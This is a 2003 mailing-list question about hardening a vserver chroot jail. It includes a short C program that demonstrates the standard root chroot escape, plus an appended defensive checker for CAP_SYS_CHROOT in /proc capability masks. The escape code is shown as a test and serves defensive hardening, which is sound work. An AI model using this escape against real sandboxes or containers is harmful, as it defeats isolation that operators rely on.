From: Mihai RUSU (dizzy_at_roedu.net)
Date: Tue 04 Mar 2003 - 15:00:05 GMT
Hi
I am trying to secure a chroot environment for vserver. Problem is that
standard chroot can be escaped very easily with a small program (if the user
has uid 0 access, if he can do chroot()).
Here is the program I use to test chroot() protection:
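#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>     /* chroot(), fchdir(), chdir() */
#include <sys/stat.h>   /* mkdir() */

int main()
{
    int fd;

    mkdir("bla", 0755);
    fd = open(".", O_RDONLY);   /* handle on a directory outside the new root */
    chroot("bla");              /* root changes, working directory does not */
    fchdir(fd);                 /* back to the directory opened above */
    chdir("../../../../../../../../../..");
    mkdir("escaped", 0755);     /* created in the real root if the escape worked */
    return 0;
}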
Doing standard chroot in a chroot environment then running this little prog
creates an "escaped" directory in the real root of the system :(
Problem is that I tried capchroot --nochroot and it does the same. Also I
have tried chcontext --secure. I was looking for help from reducecap but
it seems it doesn't remove the capability:
# reducecap --secure --SYS_CHROOT /bin/bash
Executing
# reducecap --show
...
CAP_SYS_CHROOT X X
How can I make sure nobody (not even uid 0) from a vserver can escape its
chroot jail?
Thanks
----------------------------
Mihai RUSU
Disclaimer: Any views or opinions presented within this e-mail are solely
those of the author and do not necessarily represent those of any company,
unless otherwise specifically stated.
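
A way to check the capability question raised above from the kernel's side, as an added example that is not part of the original message: it decodes the capability masks in /proc/<pid>/status text and reports whether CAP_SYS_CHROOT (bit 18 in <linux/capability.h>) is still set. The helper names and the two sample status texts are constructed for illustration, and it assumes a kernel that exposes the CapPrm/CapEff lines in that file.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CAP_SYS_CHROOT_BIT 18   /* CAP_SYS_CHROOT in <linux/capability.h> */

/* Parse the hex mask on the status line that starts with `field`
 * (e.g. "CapEff:"). Returns 0 on success, -1 if absent or malformed. */
int cap_mask(const char *status, const char *field, unsigned long long *mask)
{
    size_t flen = strlen(field);
    const char *p = status;             /* always points at a line start */
    while (p && *p) {
        if (strncmp(p, field, flen) == 0) {
            const char *v = p + flen;
            char *end;
            while (*v == ' ' || *v == '\t') v++;
            *mask = strtoull(v, &end, 16);
            return (end == v) ? -1 : 0;
        }
        p = strchr(p, '\n');
        if (p) p++;
    }
    return -1;
}

/* 1 if the named set holds CAP_SYS_CHROOT, 0 if not, -1 if the field is missing. */
int has_sys_chroot(const char *status, const char *field)
{
    unsigned long long m;
    if (cap_mask(status, field, &m) != 0) return -1;
    return (int)((m >> CAP_SYS_CHROOT_BIT) & 1ULL);
}

/* Constructed samples, not captured from a real system. */
const char SAMPLE_FULL[] =
    "Name:\tbash\nCapPrm:\t00000000ffffffff\nCapEff:\t00000000ffffffff\n";
const char SAMPLE_DROPPED[] =
    "Name:\tbash\nCapPrm:\t00000000fffbffff\nCapEff:\t00000000fffbffff\n";

int main(void)
{
    static char buf[8192];
    const char *fields[] = { "CapPrm:", "CapEff:", "CapBnd:" };
    FILE *f = fopen("/proc/self/status", "r");
    if (!f) { perror("/proc/self/status"); return 1; }
    buf[fread(buf, 1, sizeof buf - 1, f)] = '\0';
    fclose(f);
    for (size_t i = 0; i < 3; i++)      /* 1 = set, 0 = cleared, -1 = no such line */
        printf("%s CAP_SYS_CHROOT=%d\n", fields[i], has_sys_chroot(buf, fields[i]));
    return 0;
}
```

Run inside the restricted shell, a 0 for CapPrm and CapEff means the chroot() call in the test program above is refused with EPERM.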